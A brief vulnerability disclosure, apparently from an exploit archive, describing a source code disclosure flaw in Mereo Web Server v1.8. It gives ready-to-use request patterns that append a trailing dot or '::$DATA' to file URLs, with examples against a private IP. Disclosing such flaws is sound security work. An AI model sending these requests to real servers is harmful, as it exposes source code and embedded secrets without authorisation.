22 lines
No EOL
669 B
Text
22 lines
No EOL
669 B
Text
#################################################################################
|
|
#
|
|
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
|
|
# Found By: Dr_IDE
|
|
# Tested On: Windows XPSP3
|
|
#
|
|
#################################################################################
|
|
|
|
- Description -
|
|
|
|
Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
|
|
the application available.
|
|
|
|
Mereo is vulnerable to remote arbitrary source code disclosure by the following means.
|
|
|
|
- Technical Details -
|
|
|
|
http://[ webserver IP]/[ file ][.]
|
|
http://[ webserver IP]/[ file ][::$DATA]
|
|
|
|
http://172.16.2.101/index.html.
|
|
http://172.16.2.101/index.html::$DATA |